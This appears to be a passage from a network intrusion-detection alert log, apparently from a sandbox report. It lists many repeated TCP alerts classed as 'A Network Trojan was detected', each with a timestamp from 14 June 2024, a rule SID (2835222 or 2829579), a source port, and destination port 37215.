                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086165
                SID:2835222
                Source Port:57584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705504
                SID:2835222
                Source Port:56794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365982
                SID:2835222
                Source Port:39276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941112
                SID:2829579
                Source Port:52668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704931
                SID:2835222
                Source Port:35244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967678
                SID:2829579
                Source Port:48494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763816
                SID:2835222
                Source Port:56218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793133
                SID:2835222
                Source Port:36580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470857
                SID:2835222
                Source Port:51818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253131
                SID:2835222
                Source Port:53676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364802
                SID:2829579
                Source Port:47280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382589
                SID:2835222
                Source Port:51326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614066
                SID:2835222
                Source Port:43648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663685
                SID:2835222
                Source Port:42332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519435
                SID:2829579
                Source Port:51996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777981
                SID:2835222
                Source Port:40652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.386207
                SID:2829579
                Source Port:59184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012372
                SID:2835222
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625172
                SID:2829579
                Source Port:41354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230522
                SID:2835222
                Source Port:52976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225734
                SID:2829579
                Source Port:51032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663450
                SID:2829579
                Source Port:48236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915208
                SID:2835222
                Source Port:56328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146503
                SID:2829579
                Source Port:36600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151443
                SID:2829579
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032595
                SID:2835222
                Source Port:40558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185843
                SID:2835222
                Source Port:59696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943502
                SID:2835222
                Source Port:38712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015859
                SID:2835222
                Source Port:57094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564279
                SID:2835222
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679416
                SID:2835222
                Source Port:53714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860010
                SID:2829579
                Source Port:44924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734996
                SID:2835222
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807655
                SID:2829579
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.386232
                SID:2829579
                Source Port:35510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072832
                SID:2829579
                Source Port:47566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202949
                SID:2835222
                Source Port:38268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342745
                SID:2835222
                Source Port:49750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717738
                SID:2835222
                Source Port:51400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181306
                SID:2835222
                Source Port:57498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766389
                SID:2835222
                Source Port:37302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789315
                SID:2835222
                Source Port:51340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677130
                SID:2829579
                Source Port:39466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114018
                SID:2835222
                Source Port:32816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828178
                SID:2835222
                Source Port:44004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736520
                SID:2835222
                Source Port:54858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277039
                SID:2835222
                Source Port:50950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230936
                SID:2835222
                Source Port:51822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182051
                SID:2829579
                Source Port:54278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114075
                SID:2829579
                Source Port:32936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321459
                SID:2829579
                Source Port:47600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718293
                SID:2835222
                Source Port:51832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243137
                SID:2829579
                Source Port:51884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471551
                SID:2829579
                Source Port:51794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678555
                SID:2829579
                Source Port:42368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987448
                SID:2829579
                Source Port:44108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941229
                SID:2829579
                Source Port:44844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150302
                SID:2835222
                Source Port:48380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944650
                SID:2829579
                Source Port:45212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343039
                SID:2829579
                Source Port:54574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519069
                SID:2835222
                Source Port:50114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791784
                SID:2835222
                Source Port:37656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181169
                SID:2829579
                Source Port:55668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073403
                SID:2829579
                Source Port:41552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718700
                SID:2829579
                Source Port:58548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663794
                SID:2829579
                Source Port:50422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777820
                SID:2829579
                Source Port:57580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967706
                SID:2829579
                Source Port:58328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670590
                SID:2829579
                Source Port:40616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775594
                SID:2829579
                Source Port:33472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200625
                SID:2835222
                Source Port:44024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073548
                SID:2829579
                Source Port:43624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763235
                SID:2835222
                Source Port:49068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808260
                SID:2835222
                Source Port:50686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183757
                SID:2829579
                Source Port:42522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988782
                SID:2835222
                Source Port:57532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989569
                SID:2829579
                Source Port:42472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805206
                SID:2829579
                Source Port:41300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991970
                SID:2829579
                Source Port:57208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325705
                SID:2829579
                Source Port:43488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242939
                SID:2835222
                Source Port:45990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152333
                SID:2835222
                Source Port:51378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907162
                SID:2829579
                Source Port:42430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471240
                SID:2829579
                Source Port:58480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110699
                SID:2835222
                Source Port:52004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275058
                SID:2829579
                Source Port:35552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719126
                SID:2829579
                Source Port:44258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806371
                SID:2835222
                Source Port:35492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024051
                SID:2829579
                Source Port:37176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180666
                SID:2835222
                Source Port:46108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202331
                SID:2835222
                Source Port:53048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681807
                SID:2829579
                Source Port:41552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704557
                SID:2829579
                Source Port:41052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.334682
                SID:2829579
                Source Port:34304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916765
                SID:2829579
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342366
                SID:2829579
                Source Port:55816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943255
                SID:2829579
                Source Port:37128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772401
                SID:2829579
                Source Port:59784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383911
                SID:2829579
                Source Port:33240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094449
                SID:2829579
                Source Port:54716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942153
                SID:2835222
                Source Port:33672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150344
                SID:2835222
                Source Port:44404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149174
                SID:2829579
                Source Port:39392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028748
                SID:2835222
                Source Port:59692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624842
                SID:2835222
                Source Port:41766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367788
                SID:2829579
                Source Port:44700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505222
                SID:2835222
                Source Port:49130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737758
                SID:2835222
                Source Port:50188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792224
                SID:2829579
                Source Port:36548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792960
                SID:2835222
                Source Port:37736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788680
                SID:2835222
                Source Port:35666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410540
                SID:2829579
                Source Port:44118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762202
                SID:2835222
                Source Port:49812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966933
                SID:2835222
                Source Port:51008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978044
                SID:2835222
                Source Port:47362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074789
                SID:2829579
                Source Port:40802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687651
                SID:2829579
                Source Port:56072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030002
                SID:2829579
                Source Port:53638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944385
                SID:2829579
                Source Port:36752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449869
                SID:2835222
                Source Port:43638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016156
                SID:2829579
                Source Port:60526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082447
                SID:2829579
                Source Port:44398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542550
                SID:2829579
                Source Port:34244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969179
                SID:2835222
                Source Port:38698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932507
                SID:2829579
                Source Port:59212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663769
                SID:2829579
                Source Port:42408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132186
                SID:2835222
                Source Port:40522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880103
                SID:2835222
                Source Port:38162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732216
                SID:2829579
                Source Port:47162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.845520
                SID:2829579
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762963
                SID:2829579
                Source Port:47152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420552
                SID:2835222
                Source Port:51680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025269
                SID:2829579
                Source Port:59892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014955
                SID:2829579
                Source Port:56026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368978
                SID:2835222
                Source Port:59776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177546
                SID:2835222
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341269
                SID:2829579
                Source Port:46660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177325
                SID:2829579
                Source Port:37228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543803
                SID:2835222
                Source Port:43758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087167
                SID:2829579
                Source Port:59186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407834
                SID:2835222
                Source Port:53866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661783
                SID:2835222
                Source Port:46730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424987
                SID:2829579
                Source Port:53440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088850
                SID:2835222
                Source Port:47596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072247
                SID:2829579
                Source Port:52070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074908
                SID:2829579
                Source Port:35658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341180
                SID:2835222
                Source Port:59700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081603
                SID:2835222
                Source Port:35142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563067
                SID:2835222
                Source Port:56858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185234
                SID:2829579
                Source Port:32934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032300
                SID:2829579
                Source Port:38272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421314
                SID:2829579
                Source Port:44896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849353
                SID:2835222
                Source Port:34848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111811
                SID:2835222
                Source Port:54506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846132
                SID:2829579
                Source Port:47232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979919
                SID:2835222
                Source Port:58832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084179
                SID:2829579
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545502
                SID:2829579
                Source Port:47892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502851
                SID:2835222
                Source Port:46696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791815
                SID:2835222
                Source Port:55866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453112
                SID:2829579
                Source Port:49706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521739
                SID:2829579
                Source Port:55366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.147902
                SID:2829579
                Source Port:45870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776090
                SID:2835222
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451483
                SID:2835222
                Source Port:55370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245020
                SID:2835222
                Source Port:41596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683065
                SID:2829579
                Source Port:46584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896584
                SID:2829579
                Source Port:40304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663406
                SID:2829579
                Source Port:59590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565084
                SID:2829579
                Source Port:52896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941887
                SID:2829579
                Source Port:55472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678796
                SID:2835222
                Source Port:34282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150424
                SID:2835222
                Source Port:46660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717586
                SID:2835222
                Source Port:40622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791847
                SID:2829579
                Source Port:55064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326276
                SID:2829579
                Source Port:47124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073965
                SID:2829579
                Source Port:55456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700733
                SID:2835222
                Source Port:53280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339262
                SID:2835222
                Source Port:48320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163103
                SID:2829579
                Source Port:38844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861815
                SID:2829579
                Source Port:35176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367606
                SID:2829579
                Source Port:54988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705287
                SID:2829579
                Source Port:55768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790121
                SID:2835222
                Source Port:45846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850299
                SID:2835222
                Source Port:38724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471210
                SID:2835222
                Source Port:48128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.021936
                SID:2829579
                Source Port:59340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727419
                SID:2835222
                Source Port:38124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676617
                SID:2829579
                Source Port:50570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225677
                SID:2835222
                Source Port:48386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472073
                SID:2835222
                Source Port:55204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365874
                SID:2835222
                Source Port:50030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737507
                SID:2829579
                Source Port:41440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968979
                SID:2835222
                Source Port:36976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365274
                SID:2829579
                Source Port:40498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943525
                SID:2829579
                Source Port:46644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615177
                SID:2835222
                Source Port:40556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
